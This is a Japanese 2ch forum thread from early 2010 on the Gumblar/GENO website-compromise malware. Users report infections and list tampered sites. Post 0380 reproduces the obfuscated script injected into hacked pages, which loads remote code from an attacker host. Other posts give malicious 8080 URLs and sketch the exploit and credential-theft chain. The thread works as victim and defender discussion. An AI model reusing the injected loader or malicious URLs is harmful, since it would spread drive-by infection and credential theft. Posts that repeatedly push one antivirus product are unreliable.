2010/01/03(日) 23:46:12おまえそんなに悔しいのかよ
0260名無しさん@お腹いっぱい。
2010/01/03(日) 23:46:40自分で情強とか思ってるだろ
0261名無しさん@お腹いっぱい。
2010/01/03(日) 23:47:34おまえそんなに悔しいのかよ
0262名無しさん@お腹いっぱい。
2010/01/03(日) 23:47:37なんだよ情強って?
日本語で書いてくれよ
0263名無しさん@お腹いっぱい。
2010/01/03(日) 23:48:24おまえそんなに悔しいのかよ
0264名無しさん@お腹いっぱい。
2010/01/03(日) 23:48:52だいたいなんでそんなに悔しいがるんだよ
勘違いしてるんじゃないか
0265名無しさん@お腹いっぱい。
2010/01/03(日) 23:51:57かわいそうに悔しくても荒らすなよ
だいたいなんでそんなに悔しいがるんだよ www
0266名無しさん@お腹いっぱい。
2010/01/03(日) 23:53:150267名無しさん@お腹いっぱい。
2010/01/03(日) 23:56:39今のところ無許可で書き換えはないと思う
最近のは保護機能があるのも多いしね
0268名無しさん@お腹いっぱい。
2010/01/04(月) 00:10:49自分も初期のGENOウイルスでカスペルスキーで感染しました。
良くHIPSやプロアクティブの事を言われる方を見受けますが実際は
GENOウイルスには全く役に立ちませんでした、
そのGENOで4月末から5月初旬まで非常に困った経験者です。
初期のものはカスペルスキーでも反応はするのですが阻止できませんでした。
前バージョンの7.0をWin2000で使っていましたが、アドビリーダーの5と9を
両方混在させていたのが失敗でした。
IE6、ファイヤーフォックス3でのグーグルツールバーに細工をしてしまい、
何を検索しても、海外の謎の黒バックに青文字のサイトが表示されてしまいました。
次に出たバージョンでは、なにを検索しても404Not Foundと表示されて、
(404にも色々なバージョンがありました。)実は表示自体がウソで他のサイトに
さらにアクセスさせようとしていました。何かの送信が止まらない、ネットワークの
切断出来ない。IPアドレスの解放と再収得が出来ない。なんだこれは。といった
状態で、ブチ。とLANケーブルを引っこ抜きました。
0269名無しさん@お腹いっぱい。
2010/01/04(月) 00:16:51どうもです
取り敢えず安心できそう
0270名無しさん@お腹いっぱい。
2010/01/04(月) 00:25:11JREって呼ぼうぜw
0271名無しさん@お腹いっぱい。
2010/01/04(月) 00:42:25実際>>159で試したところ
FWで最初に確認できるアクセス以前での情報流出は確認できない
あくまでもそのサイトでってことだけどね
0272名無しさん@お腹いっぱい。
2010/01/04(月) 03:19:13私のPCが起動するとこんな風になるようになったんですが、
これはこのスレのウイルスに該当しているんですかね?
ちなみにOSはvistaで、
この画像の状態は起動して、
ロゴマークがでて、ユーザーログインしてからの状態です。
0273名無しさん@お腹いっぱい。
2010/01/04(月) 03:21:560274名無しさん@お腹いっぱい。
2010/01/04(月) 03:31:31でも背景が真っ暗で、下のスタートのバー?所が真っ白になってます。
真っ白な所に合わせると、矢印から砂時計になります。
この画面から何も操作できないです。
どうすれば復旧できますか?
甘えかも知れませんが、教えていただけるとありがたいです。
0275名無しさん@お腹いっぱい。
2010/01/04(月) 06:20:38>自分も初期のGENOウイルスでカスペルスキーで感染しました。
>良くHIPSやプロアクティブの事を言われる方を見受けますが
>実際はGENOウイルスには全く役に立ちませんでした、
カスペルスキーの無力ぶりにワロタwww
0276名無しさん@お腹いっぱい。
2010/01/04(月) 07:43:59安心しようとしているところが笑えるスレですね
回避されてるんじゃぁあって思わないのかね
でなきゃこんだけ広がるのはおかしいでしょ
0277名無しさん@お腹いっぱい。
2010/01/04(月) 08:10:45こういうスレ見てる奴はまあいいんだよ
問題なのはPCに使われてる(笑)一般人
GumblarとかGENOとか知ってる?て聞いても「なにそれ」で終わる
もちろんセキュリティソフトなんて入れてないし、入れようともしない
家電感覚でPC買ってる奴はこんなんばっかりだな
0278名無しさん@お腹いっぱい。
2010/01/04(月) 08:13:43ほんとしつこいね
その程度の人はお前だけだよ
0279名無しさん@お腹いっぱい。
2010/01/04(月) 08:27:36ほんとしつこいね
その程度の人はお前だけだよ
0280名無しさん@お腹いっぱい。
2010/01/04(月) 08:29:200281名無しさん@お腹いっぱい。
2010/01/04(月) 08:30:29脆弱性を利用してpdfupd.exeがダウンロードされ実行される
トロイ本体が解凍され実行される
ここで通信が行われるからすぐ分かるって話なんだよ
異変に気づけば何らかの対処ができるだろうってこと
0282名無しさん@お腹いっぱい。
2010/01/04(月) 08:30:430283名無しさん@お腹いっぱい。
2010/01/04(月) 08:32:02これでおしまいにしてくれよ
0284名無しさん@お腹いっぱい。
2010/01/04(月) 08:33:080285名無しさん@お腹いっぱい。
2010/01/04(月) 08:35:16で、どこのFWなら分かって、どこのFWなら分からないの?
0286名無しさん@お腹いっぱい。
2010/01/04(月) 08:44:35分からないFWは外向き通信を監視しないやつやそう設定してる場合
具体的にと言うなら俺はOutpostを使ってる
もちろんその他のソフトでも問題ない
0287名無しさん@お腹いっぱい。
2010/01/04(月) 08:59:260288名無しさん@お腹いっぱい。
2010/01/04(月) 11:30:310289名無しさん@お腹いっぱい。
2010/01/04(月) 11:37:570290名無しさん@お腹いっぱい。
2010/01/04(月) 12:00:360291名無しさん@お腹いっぱい。
2010/01/04(月) 12:05:59>>4
テンプレ見てないんじゃ甘えだろ
感染前のレジストリに戻せば直るかもな
0292名無しさん@お腹いっぱい。
2010/01/04(月) 17:08:49数分待って自サイトソース確認するも改ざん現れず
何故生き残ったのか、自分でも分からん
XP(昨年11月以降未うp立て)、IE6(ジャバスクオン)
adobeリーダーのジャバスクは切ってあったが、これが命綱だったのか?
0293名無しさん@お腹いっぱい。
2010/01/04(月) 18:23:09そいつに教えておいたFTPアカウント全部書きかえられてたわ
0294名無しさん@お腹いっぱい。
2010/01/04(月) 18:25:36tp://kyu-ta●sakura●ne●jp/blog/
tp://kyu-ta●sakura●ne●jp/nekkei080401●mht
tp://blog●dtpwiki●jp/dtp/
tp://pcafe●blog3●fc2●com/
tp://blog3●fc2●com/pcafe/
tp://tukimisou●s10●xrea●com/
※〜〜xrea.comは全滅っぽい気がする
tp//lists●sourceforge●jp/mailman/archives/slashdotjp-dev/
tp://www●aoki●ecei●tohoku●ac●jp/topic/RSNA_press_release/HealthImaging_com●mht
妙なとこだけ改竄されてるし
0295名無しさん@お腹いっぱい。
2010/01/04(月) 18:34:34↓
http://www.google.com/safebrowsing/diagnostic?site=gumblar.cn/&hl=ja
Google が最後にこのサイトを巡回したのは2010-01-03で、
このサイトで不審なコンテンツが最後に検出されたのは2010-01-03です。
0296名無しさん@お腹いっぱい。
2010/01/04(月) 19:16:37教えてやれよ
0297名無しさん@お腹いっぱい。
2010/01/04(月) 20:54:55294じゃないけど、fc2の方にメールを送ろうと思ったら
IDを持っていないとそもそも相手にしてくれないようなので
メールすら送れない・送り先が分からない。
こういうので個人あてにメールを送っても返信が来た試しがない。
0298名無しさん@お腹いっぱい。
2010/01/04(月) 20:55:09どこもやられてないじゃん。
お前さんのキャッシュに妙な物が追記されるなら、お前さんが感染してるんじゃね。
0299名無しさん@お腹いっぱい。
2010/01/04(月) 21:05:16確かに仮想機(うぃんXP2)で踏んでみても何も起こらない・・・
0300名無しさん@お腹いっぱい。
2010/01/04(月) 21:24:38新手の宣伝か?(笑)
0301名無しさん@お腹いっぱい。
2010/01/04(月) 22:11:490302名無しさん@お腹いっぱい。
2010/01/04(月) 22:53:39http://tsushima.2ch.net/test/read.cgi/news/1262611814/
0303名無しさん@お腹いっぱい。
2010/01/04(月) 23:03:250304名無しさん@お腹いっぱい。
2010/01/04(月) 23:08:200305294
2010/01/04(月) 23:22:08釣ってすまなかったが、
感染してないという検証ありがとう。
【8080チェッカー】
ttp://www12.atpages.jp/trick1/
↑↑↑
ザル&誤検出過多という事が証明されたよw
0306名無しさん@お腹いっぱい。
2010/01/04(月) 23:38:330307名無しさん@お腹いっぱい。
2010/01/05(火) 00:31:40数分じゃわからんよ
0308名無しさん@お腹いっぱい。
2010/01/05(火) 00:32:450309名無しさん@お腹いっぱい。
2010/01/05(火) 00:33:500310名無しさん@お腹いっぱい。
2010/01/05(火) 00:34:58本スレはこっちですよ。
GENOウイルススレ ★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/
0311名無しさん@お腹いっぱい。
2010/01/05(火) 00:38:46に飛んだらNODが反応したんだけど大丈夫かよ
0312名無しさん@お腹いっぱい。
2010/01/05(火) 00:39:48モロゾフで急に騒がしくなったな
0313名無しさん@お腹いっぱい。
2010/01/05(火) 00:40:080314名無しさん@お腹いっぱい。
2010/01/05(火) 00:40:09騒ぎ立てるバカが発生するのか
しかもわざわざセキュ板覗いてる程なのに
0315名無しさん@お腹いっぱい。
2010/01/05(火) 00:42:32色んなやつがいるから仕方ない
0316名無しさん@お腹いっぱい。
2010/01/05(火) 00:58:25ttp://www.virustotal.com/analisis/94a2bd34b99ebb992e019c2b7b05e4ed6e6b9400b313b1de1cd60366e2eaa2b3-1262614148
0317名無しさん@お腹いっぱい。
2010/01/05(火) 00:59:35ずっとその話してるのに
0318名無しさん@お腹いっぱい。
2010/01/05(火) 01:17:100319名無しさん@お腹いっぱい。
2010/01/05(火) 01:21:44いちおう、MicrosoftのSmartScreenと、ゴーグルのセーフブラウジングとやらに
モロゾフ報告したけど、いまだに変化なし
0320名無しさん@お腹いっぱい。
2010/01/05(火) 02:29:25チェッカーの性能がわかったじゃないかw
0321名無しさん@お腹いっぱい。
2010/01/05(火) 03:13:550322名無しさん@お腹いっぱい。
2010/01/05(火) 03:23:060323名無しさん@お腹いっぱい。
2010/01/05(火) 09:54:58一晩たったが大丈夫そうだ
やっぱReaderのジャバスク切ってたのが効いたらしい。今では大抵のベンダーが検出できるっぽいし、漸く一安心だ
0324sage ◆sage/xLnlI
2010/01/05(火) 15:16:29踏んじゃった
でもnorton先生が止めてくれた
0325名無しさん@お腹いっぱい。
2010/01/05(火) 16:26:020326名無しさん@お腹いっぱい。
2010/01/05(火) 17:04:330327名無しさん@お腹いっぱい。
2010/01/05(火) 17:17:530328名無しさん@お腹いっぱい。
2010/01/05(火) 17:34:350329名無しさん@お腹いっぱい。
2010/01/05(火) 19:19:24ホンダもやられてたのね
0330名無しさん@お腹いっぱい。
2010/01/05(火) 19:43:16何をいまさら…。
JR東日本 ttp://www.jreast.co.jp/apology/20091223_restart.html
本田技研 ttp://www.honda.co.jp/oshirase/
モロゾフ ttp://www.morozoff.co.jp/_cms_/news_item/detail/item00085.html
信越放送 ttp://www.sbc21.co.jp/notice/notice091227.html
デジタルマガジン ttp://digimaga.net/2009/12/about-infection-to-the-gumblar-virus.html
アニたまどっとコム(ラジオ関西) 告知消失
0331名無しさん@お腹いっぱい。
2010/01/05(火) 23:02:13AVGフリー、Ad-Aware、spybotしか使っていない俺はどうしたらいいのでしょうか?
0332名無しさん@お腹いっぱい。
2010/01/05(火) 23:24:030333名無しさん@お腹いっぱい。
2010/01/05(火) 23:35:190334名無しさん@お腹いっぱい。
2010/01/05(火) 23:46:07次は辻ブログか
どこまで感染が広まるやら
0335名無しさん@お腹いっぱい。
2010/01/05(火) 23:58:58これで感染させることができるの?
0336名無しさん@お腹いっぱい。
2010/01/06(水) 00:28:270337名無しさん@お腹いっぱい。
2010/01/06(水) 02:21:35無理。つかwin.jpgは関係ない。
0338名無しさん@お腹いっぱい。
2010/01/06(水) 02:47:02分からないなら黙ってろ
0339名無しさん@お腹いっぱい。
2010/01/06(水) 03:15:52解読して出てきたURL先のものをjavascriptだぞと
というのは記述してるわけ
で今のウィルスってjavascriptで読み込ませたとしても
悪さするプログラムって実行できるわけ?
そもそも勝手なプログラムの実行はvistaだと防げるわけだし
やっぱりアドビの0-dayでアップデートに紛れ込んで
FTPを盗むプログラムを実行したと思われる
だから今のところ/*GNU GPL*/のスクリプト読んでも無害なんじゃね
詳しい人どう思う?
0340名無しさん@お腹いっぱい。
2010/01/06(水) 03:18:45頭のjsがやられてるからハロプロ全体のような希ガス
tp://knnn4321●chips●jp/js/prototype●js
↓
/*GNU GPL*/ try{window.onload
0341名無しさん@お腹いっぱい。
2010/01/06(水) 03:22:02それが出来ちゃう脆弱性を利用してるわけ
vistaでも実行は可能だがUACオンだとスタートアップに登録可能かどうかは知らない
0342名無しさん@お腹いっぱい。
2010/01/06(水) 03:24:46実行できちゃえば
再起動までは攻撃は有効だと思う
0343名無しさん@お腹いっぱい。
2010/01/06(水) 03:26:03というか基本的なことを分かってない
このスレ読んだだけでももう少し分かるだろ
0344名無しさん@お腹いっぱい。
2010/01/06(水) 03:35:39何度も言われていると思うが
モロゾフのやつは
Microsoft Video ActiveX コントロールの脆弱性
Adobe Reader/Acrobatの脆弱性
Sun Javaの脆弱性
の三つの脆弱性のどれかが使われる
0345名無しさん@お腹いっぱい。
2010/01/06(水) 03:46:29Microsoft Video ActiveX コントロールの脆弱性
Adobe Reader/Acrobatの脆弱性
Sun Javaの脆弱性
このどれかをついてプログラムが実行されちゃうってこと?
0346名無しさん@お腹いっぱい。
2010/01/06(水) 03:48:340347名無しさん@お腹いっぱい。
2010/01/06(水) 05:27:59win.jpgは脆弱性を突いてクラッシュさせるのが役目で、そいつだけじゃ感染しない。
そいつを読み込ませるJavaScript側でshellコードを生成し、メモリー内にまき散らしておいて
クラッシュ -> shellコード実行 -> ウイルス本体召喚 -> ざまあ!
0348名無しさん@お腹いっぱい。
2010/01/06(水) 09:31:04一時のAd-AwareとSpyBotみたいに
ウイルスソフトって入れまくってもいいの?
0349名無しさん@お腹いっぱい。
2010/01/06(水) 09:37:53http://pc11.2ch.net/test/read.cgi/sec/1261930389/357-375
0350名無しさん@お腹いっぱい。
2010/01/06(水) 10:09:14今回のGumblarってXXSだろうけど、となるとツールバーに危険と表示される間もなくホンダなどのサイトでは安全性:完全ってなるんだろうか?
ホンダとか感染したサイト行く勇気は無いんですが、このツールバーでGumblarを予防できるものなんでしょうか?
もし出来なきゃこのツールバーなんの意味があるのかなと思ったりもしますが・・・
0351名無しさん@お腹いっぱい。
2010/01/06(水) 10:39:550352名無しさん@お腹いっぱい。
2010/01/06(水) 11:44:08adsrevenue-net.king.com.newgrounds-com.themobilewindow●ru:8080/pics/win.jpg
からの侵入をノートンが遮断したログが残ってるんですけどこれってなに?
2chを閲覧してたら誘導されたってことかな?
0353名無しさん@お腹いっぱい。
2010/01/06(水) 11:48:11自分のブログも一応、確認しよう・・・
0354名無しさん@お腹いっぱい。
2010/01/06(水) 11:49:57>>1よめ
0355名無しさん@お腹いっぱい。
2010/01/06(水) 11:59:40twintailが
HTTP MS MPEG2TuneRequestControl ActiveX BO 2 をと書いてあったので
2chの閲覧が原因かと思ったのですがね。
0356名無しさん@お腹いっぱい。
2010/01/06(水) 12:03:00sciencedirect-com.lequipe.fr.gamestop-com.superore●ru:8080/verycd.com/verycd.com/google.com/zaobao.com/rakuten.co.jp/
を経由して
ks369871●kimsufi●com:8080
から.jsファイルをダウンロードしようとしていた。だた、このファイルがダウンロードできなかったので助かったようだ。
0357名無しさん@お腹いっぱい。
2010/01/06(水) 12:09:430358名無しさん@お腹いっぱい。
2010/01/06(水) 12:16:57そのURLはこのスレの76で直リンされてて
俺の場合、専ブラで画像を自動サムネイルするようにしてるので
専ブラがアクセスしたらAvastのネットワークシールドが遮断した
0359名無しさん@お腹いっぱい。
2010/01/06(水) 12:21:1676を見ただけでノートンが遮断しました。
原因が解ってほっとしました。 有り難うございます。
0360名無しさん@お腹いっぱい。
2010/01/06(水) 12:24:38507 名前:名無しさん@お腹いっぱい。 投稿日:2010/01/05(火) 00:45:49 ID:zAbuPfRw0
砂箱に入れたFirefoxからFirebugで色々見てみたけど
呼び出される本体のjsファイルがNot foundで発火しないね
508 名前:名無しさん@お腹いっぱい。 投稿日:2010/01/05(火) 00:55:20 ID:qZhWCv8d0
アクセス制御で2回目以降は404を装う。
509 名前:名無しさん@お腹いっぱい。 投稿日:2010/01/05(火) 01:13:20 ID:zAbuPfRw0
串さしてやったら死んだわ・・・
やばいな
0361名無しさん@お腹いっぱい。
2010/01/06(水) 12:30:38まじかー!
0362名無しさん@お腹いっぱい。
2010/01/06(水) 12:55:380363名無しさん@お腹いっぱい。
2010/01/06(水) 13:09:00gumblarの頃からそういうアクセス制御は入ってるよ。
gumblar.xでは2段構成のうちリダイレクト先(ウイルスばら撒き側)は
陥落サイト群の中からPHPが動作しているサイトが選別されていた。
0364名無しさん@お腹いっぱい。
2010/01/06(水) 13:47:15http://www.virustotal.com/jp/analisis/a58e3a42daf56fa95d67a157b9c699e43e89e254bcc717ff04d9d19d1ffb40b4-1262708521
対応済み:Avira・Kaspersky・McAfee・NOD32・Panda・Symantec etc
JavaGame.jar
http://www.virustotal.com/jp/analisis/64b9d4cf390e37a1017b8a585917c0d21c476cdd59193cc3b28fe46861ffd921-1262708821
対応済み:Avira・MSE・Symantec・TrendMicro etc
0365名無しさん@お腹いっぱい。
2010/01/06(水) 14:27:450366名無しさん@お腹いっぱい。
2010/01/06(水) 14:31:16PC雑誌の熟読には自信があります。
>通称GENOウイルスに強いかどうか、
ええ、強い方ですけど。
基本的にGENOだろうと何だろうと今はもう何らかの悪意を持つプログラムや
スクリプトを総称してマルウェアと呼んでいます。昔からの名残で説明の便宜上
使うとかその程度の意味しかないです。
私のこれまでの経験から言うとすれば、Kaspersky Internet Security 2010が最もおすすめです。
2010ではBehavior BlockerやHIPSに加えて仮想実行スペースも搭載されたのでGumblar
(日本の通称ではGENOウイルス)パターンでもバッチリ防げます。
0367名無しさん@お腹いっぱい。
2010/01/06(水) 14:43:370368名無しさん@お腹いっぱい。
2010/01/06(水) 14:48:07て言うウイルスが2回も・・・・
0369名無しさん@お腹いっぱい。
2010/01/06(水) 15:17:310370名無しさん@お腹いっぱい。
2010/01/06(水) 16:34:22対応早くなったかな?
0371名無しさん@お腹いっぱい。
2010/01/06(水) 16:47:360372名無しさん@お腹いっぱい。
2010/01/06(水) 16:50:250373名無しさん@お腹いっぱい。
2010/01/06(水) 16:52:120374名無しさん@お腹いっぱい。
2010/01/06(水) 16:57:390375名無しさん@お腹いっぱい。
2010/01/06(水) 18:17:460376名無しさん@お腹いっぱい。
2010/01/06(水) 18:41:26いつの間にか悪名高いSecurity Toolがインストールされてたw
もう少し遊んでみよう
0377名無しさん@お腹いっぱい。
2010/01/06(水) 18:55:34avast!はコード自体をwebシールドで弾くから無問題。
0378名無しさん@お腹いっぱい。
2010/01/06(水) 19:36:160379名無しさん@お腹いっぱい。
2010/01/06(水) 19:39:000380名無しさん@お腹いっぱい。
2010/01/06(水) 19:54:30/*GNU GPL*/
try{window.onload = function(){var U26gcel3nnek = document.createElement('s@$$&c)$&r$i#(p#$!t!!('.replace(/@|\)|\!|\(|\^|\$|&|#/ig, ''));
var Zavq7z4z78k = 'Imrp1rhevfo';
U26gcel3nnek.setAttribute('type', 't(^$e&@&x!!$t!@&/)j((a)v&&a@(^s(!c((r!i$!p!$t!(#'.replace(/\^|#|&|\!|\(|\$|\)|@/ig, ''));
U26gcel3nnek.setAttribute('src', 'h())&t)t$$p@#:)^$)/((^/!$#g!o(&&u^^^g!$o?u!-$&c!)!o)^$$m)@!^.$(#n&)$i
#(n^#^g@.&@c&$#o@m(.)a###!c#(e!$$(r$$-^#c!@o)@!$m@.$^s)(u!@p$$e@r@(a(g(@^u)$&)!i#d!e&!!#.!@^r(^u^:)
#8&^#&0#(8)^0^/!!#i@$)#n^$@$.&!)!c&!(o((!m$&&/$i#!$n#!).)$@c#(^o@!$&m(@/@$g@o))o^&g@&l!#e!.^)c))o@
m#&@/$^#v#)i!)#d!^@e&)$)o@)!@@s#z$(.?^c@!$o!m(^^/@b^(&e#!@&s@((t)#$@#t&^)^u&b!(e^)c$^#l!@)i$)&!$p)
@s!$^$(.&$c@&)@o)!$m(^#&/('.replace(/\!|@|#|\$|\(|&|\^|\)/ig, ''));
U26gcel3nnek.setAttribute('defer', 'd!$@$e@f!!(&(e^r@)'.replace(/@|\(|\$|#|\!|\)|\^|&/ig, ''));
U26gcel3nnek.setAttribute('id', 'M$e!$7#!)r#!$l?@^9()!(#t$!^9&q#)@$$b&&^!3&@)'.replace(/\^|\)|@|&|\$|\!|\(|#/ig, ''));
document.body.appendChild(U26gcel3nnek);}}
catch(Lpmpa57y1j) {}
</script>
<!--86fa61201e3ca3a075145a1d33d3c209-->
0381sage ◆sage/xLnlI
2010/01/06(水) 19:59:260382sage ◆sage/xLnlI
2010/01/06(水) 20:05:47ソース
どちらさまかWindows7の感染確認方法を教えていただける方はいらっしゃいませんでしょうか
0383名無しさん@お腹いっぱい。
2010/01/06(水) 20:06:300384名無しさん@お腹いっぱい。
2010/01/06(水) 20:07:49これって、もしかして同じLANから見たら、一人目しか感染しないってことか?
0385名無しさん@お腹いっぱい。
2010/01/06(水) 20:18:27http://tsushima.2ch.net/test/read.cgi/news/1262766483/l50
0386名無しさん@お腹いっぱい。
2010/01/06(水) 21:22:22んなもんないからとっととOSいれなおせ
0387sage ◆sage/xLnlI
2010/01/06(水) 21:24:34えっ
いまノートン先生が0v3exclv.exeを削除してくれました
0388名無しさん@お腹いっぱい。
2010/01/06(水) 21:26:090389名無しさん@お腹いっぱい。
2010/01/06(水) 21:44:36それだけかどうかわからないよ
0390名無しさん@お腹いっぱい。
2010/01/06(水) 22:40:20http://tsushima.2ch.net/test/read.cgi/news/1262784863/
0391名無しさん@お腹いっぱい。
2010/01/06(水) 22:52:56firefoxにはnoscript入れてなかったの?
それとも入れた結果がこれだyoってこと?
0392名無しさん@お腹いっぱい。
2010/01/06(水) 23:19:000393名無しさん@お腹いっぱい。
2010/01/06(水) 23:19:530394名無しさん@お腹いっぱい。
2010/01/06(水) 23:23:15なんだこの差は
0395名無しさん@お腹いっぱい。
2010/01/06(水) 23:31:25"セキュリティツール"の画面が出てくるって騒ぎになっていると聞いたような。
具体的な場所は分からないけど。
0396名無しさん@お腹いっぱい。
2010/01/06(水) 23:40:220397名無しさん@お腹いっぱい。
2010/01/07(木) 00:26:16Security Toolな。
これも改ざんされたサイトを閲覧して、脆弱性を利用して感染するらしい
0398名無しさん@お腹いっぱい。
2010/01/07(木) 00:37:14検出されたウイルス(ワーム、スパイウエア)
Trojan-Downloader.JS.Agent.ewh
0399名無しさん@お腹いっぱい。
2010/01/07(木) 00:44:56そのウィルスはつい最近まで、GDATAの誤検出だとずっと思ってた。
0400名無しさん@お腹いっぱい。
2010/01/07(木) 00:46:38https://www●global2j-education●com/contact
↑↑↑
httpsが、、、
0401名無しさん@お腹いっぱい。
2010/01/07(木) 00:49:02グーグル辺りがやってくれないかな・・・・
0402名無しさん@お腹いっぱい。
2010/01/07(木) 00:49:400403名無しさん@お腹いっぱい。
2010/01/07(木) 00:56:28p://www●spacecraft●co●jp/home●html
スペースクラフトグループ
神田うの、黒谷友香、栗山千明、岩田さゆり、青山倫子、宇浦冴香、等が所属。
ガンブラーキタ━(゚∀゚)━!!
0404名無しさん@お腹いっぱい。
2010/01/07(木) 01:21:53PC雑誌の熟読には自信があります。
あなた方には高度な話になりますが、最近のクラッカーは対策ソフトの
利用を予め想定していて、これを回避するようにいろいろ画策してきます。
今ではアンチウイルスの回避なんて簡単にできるようになっていますし、
Personal Firewallもバイパスできる場合も結構あります。
ここの閲覧者の方々も含めて申しますけど、ここ最近は対策ソフト
回避技術が非常に進歩してきましたので、機関系テストでNo.1の
ソフトだからとかそんな簡単な話ではなくなっています。
私の豊富なテストと経験からすればKaspersky Internet Security 2010が最もおすすめです。
2010ではBehavior BlockerやHIPSに加えて仮想実行スペースも搭載されたのでGumblar
(日本の通称ではGENOウイルス)パターンでもバッチリ防げます。
0405名無しさん@お腹いっぱい。
2010/01/07(木) 01:27:050406名無しさん@お腹いっぱい。
2010/01/07(木) 01:45:250407名無しさん@お腹いっぱい。
2010/01/07(木) 01:52:47カゴヤのホスティングサーバが不正アクセス被害 - ウェブアプリの脆弱性狙われる
関連7サイトが改ざん被害、閲覧でウイルス感染のおそれ - 出版文化社
通販サイトなど運営する3サイトで改ざんが発生 - 岐阜の恵那バッテリー電装
0408名無しさん@お腹いっぱい。
2010/01/07(木) 01:59:19年末にあるサイトを見たら、瞬間的にいくつ窓が開き、Acrobat6が自動起動。
そして固まる。PCを強制再起動。
再起動すると、Antivirに反応するファイルがゾロゾロすごい数でてくる。名前
はまともらしいが、ほぼすべて削除。いくつかもらしたかも。
次の日に再起動しても、また反応ファイルがぞろぞろ。このあたりで難しいウイルス
かも?と気がついて、とにかく反応するものをすべて削除。TV番組表自動取得
のためのものも、削除してしまった。
その後、スキャンにひっかかるものはテンポラリファイルにある実行ファイル
だけになる。簡単に削除。しかし、siszyd32.exeについては「ファイルが開けない」
という警告のみでる。一旦安心。
0409名無しさん@お腹いっぱい。
2010/01/07(木) 02:00:40判明するが、ファイル本体がどうしても見えない。隠しファイルを表示にしても、
見えない。ただ、存在が指摘されたフォルダで、
siszyd32.exeフォルダを作成するとできないことから、やはり存在する
ことが判明。
ググッてみたけれど、有効策が見つからず。レジストリの中に見つからず、
カスペのフリーツールはデータベースが壊れていると出てつかえなかった。
また、何もしていなくてもCPU使用率が50%になっていることに気がついた。
不審なプログラム、プロセスは自分の知識ではみあたらず。
今日になって、いろいろ削除方法を探してみたところ、セーフモードで起動
するとうまく削除できるらしいので、試してみた。すると、
\プログラム\スタートアップ\siszyd32.exe が何もしなくてもはっきり
見えていたので、削除して再起動したところ、CPU使用率が5%くらいに
落ちた。多分、解決。
今は、siszyd32.exeがCPUをあんなに使用して何をしていたのかが気になって
いる。サイトの運営はしていないが、どうしたらいいものか・・・。ヤフー
とかのパスを変更した方がいいのかな。
0410名無しさん@お腹いっぱい。
2010/01/07(木) 02:11:16OSのクリーンインストールを薦める
面倒だとは思うが、やっておいたほうが絶対にいいぞ
0411名無しさん@お腹いっぱい。
2010/01/07(木) 02:19:00するくらいなら、新しいPCを7で自作しようか検討中。
自分はウイルスやファイアーウォールに詳しくないので、これを機に勉強
しようと思ってます。
今回のウイルスは8,9年くらい前に大流行したウイルスを思い起こさせ
ますね。これを機にセキュリーティーが強化されたはずなのに、こんなに
あっさり感染するとは・・・。WEBを見ただけで感染というのは問題が
ありすぎる。自分の周りはもっとPCに疎い人ばかりなので、明日は職場で
大変だ。
0412名無しさん@お腹いっぱい。
2010/01/07(木) 02:23:37ネット史上最悪のウィルスとなり得る可能性があるな
事の始まりは去年の春辺りだったか
そこから、表面上に出てくるまで一気に広がり始めた印象
0413名無しさん@お腹いっぱい。
2010/01/07(木) 02:25:23↓
Adobe Readerを最新版に更新してないと
脆弱性をつかれてウィルス実行される
↓
FTPのID、パスがあれば盗まれる
というか盗んで送信するプログラムが常駐される
↓
盗まれたFTPのID、パスでサイトを改ざん
↓
ループ
0414名無しさん@お腹いっぱい。
2010/01/07(木) 02:27:220415名無しさん@お腹いっぱい。
2010/01/07(木) 02:28:59ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2108
0416名無しさん@お腹いっぱい。
2010/01/07(木) 02:34:46未知のセキュリティホールを突かれない事を祈るばかり
0417名無しさん@お腹いっぱい。
2010/01/07(木) 02:39:08それを考えるとHIPS入れておく方がいいのかね
0418名無しさん@お腹いっぱい。
2010/01/07(木) 02:41:37市販のウィルスソフトなんか役に立たないと
ばれちゃうなw
0419名無しさん@お腹いっぱい。
2010/01/07(木) 02:43:24まあ、これは現実世界のウイルスでも同じだけど
0420名無しさん@お腹いっぱい。
2010/01/07(木) 02:48:17ウィルスソフト→定義更新が間に合わない
各ソフトウェアを最新の状態にしておく→現状ではこれが無難
javascriptを無効化する→ブラウジングに支障が出る
頻繁にブラウジングする立場(様々なオンラインショップで購入したりもする)としては若干怖い
0421名無しさん@お腹いっぱい。
2010/01/07(木) 02:56:00脅威には感じないけどね(仕事関連は別だけど)
0422名無しさん@お腹いっぱい。
2010/01/07(木) 03:08:470423名無しさん@お腹いっぱい。
2010/01/07(木) 03:23:210424名無しさん@お腹いっぱい。
2010/01/07(木) 03:30:33まあ日本をピンポイントに突いてくる奴しか見つけても使わないだろうけどw
専ブラによっちゃIEの脆弱性の影響受ける奴あるのかな?
>>376,395,397
Security Toolに関してはこれだね
ttp://blogs.yahoo.co.jp/noooo_spam/59325476.html
ttp://blogs.yahoo.co.jp/noooo_spam/59347678.html
8080のスクリプトがこいつらに変わってるとこもあるとか
8080を操ってる奴らは、裏市場でボットネットみたいな販売方法使って儲け始めたんだろうか?
0425名無しさん@お腹いっぱい。
2010/01/07(木) 03:40:010426名無しさん@お腹いっぱい。
2010/01/07(木) 03:43:34tp://117117●fc2web●com/
これはGNU GPLぐっじょぶw・・で宜しいのかな?
0427名無しさん@お腹いっぱい。
2010/01/07(木) 04:57:05C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
0428名無しさん@お腹いっぱい。
2010/01/07(木) 06:50:120429名無しさん@お腹いっぱい。
2010/01/07(木) 07:15:070430名無しさん@お腹いっぱい。
2010/01/07(木) 07:19:11新たな違う攻撃なら変わるだろうけど
コロコロ変わったところは確認してない
0431名無しさん@お腹いっぱい。
2010/01/07(木) 07:35:14どう変わった?
0432名無しさん@お腹いっぱい。
2010/01/07(木) 07:39:510433名無しさん@お腹いっぱい。
2010/01/07(木) 07:40:00ころころ変わるのは別物
0434名無しさん@お腹いっぱい。
2010/01/07(木) 07:40:430435名無しさん@お腹いっぱい。
2010/01/07(木) 09:08:47終了時に強制的にupdateされない?
0436名無しさん@お腹いっぱい。
2010/01/07(木) 09:18:24今の段階でそんなこといってたらそら引っかかるわ
0437名無しさん@お腹いっぱい。
2010/01/07(木) 09:54:17俺もそれ知りたい。
月曜の晩、俺のPCでNOD32が8080系を検知したサイトを、奥さんが別PCで見ちゃったの。ウィスルセキュリティーZEROはスルー。
でも、どんなに調べても感染の形跡がないのさ。
